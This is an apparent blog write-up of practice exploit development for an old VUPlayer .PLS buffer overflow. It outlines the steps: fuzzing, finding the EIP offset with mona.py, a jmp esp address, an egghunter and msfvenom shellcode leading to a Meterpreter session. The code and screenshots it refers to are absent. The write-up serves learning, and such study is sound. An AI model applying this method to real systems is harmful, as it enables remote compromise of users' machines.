Lately I decided to perform another 'quick autopsy' of the bug found few years ago in VUPlayer. Here we go...
We will start here:
During this research I used:
- Windows 7 (32bit)
- mona.py with ImmunityDebugger
I started from fuzzing (.PLS) to check if there are any other possible bugs (related to parsing PLS).
I landed here:
Ok, so we will prepare a basic skeleton for our poc:
After trying this (vtest1.pls) file in VUPlayer we should see 41414141 value in registers.
I tried to prepare a new content for our PLS file using mona.py (!mona pc 2000) but after using this payload I wasn't able to crash the program again. So I decided to use another approach. I restarted the program in ImmunityDbg and started it with our 1st created sample file:
As you can see we landed at 0x0012eca4. Click on that address (2 times) and scrol up to the beginning of our 'shellcode' (AAAA):
After a while you should see:
Now let's open calc.exe ("programmer's calc") and tyle there your value for the shellcode beginning (3f8 in my case). Next switch to DEC(imal values):
So we know that we can overwrite EIP with shellcode 1012 + 4*(our)A = 1016. Let's try. Rewriting our poc.py:
So far so good. Now we need to find a way to run the shellcode on the stack. I decided to use !mona again to find the address (!mona jmp -r esp).
We will put that value as our 0xdeadbeef:
So fa, so good. :) Next I used egghunter (!mona egg) and shellcode created by msfvenom:
Now we should be ready to prepare a working poc:
Waiting with Meterpreter:
And we're ready to go:
I must say it was a good idea to practice a bit with this case.
More information about it you can find here:
- 1 - by rafaveira3
- 2 - by corelan
- 3 - by shogunlab
- 4 - by fuzzysecurity
- 5 - by securitysift
See you next time.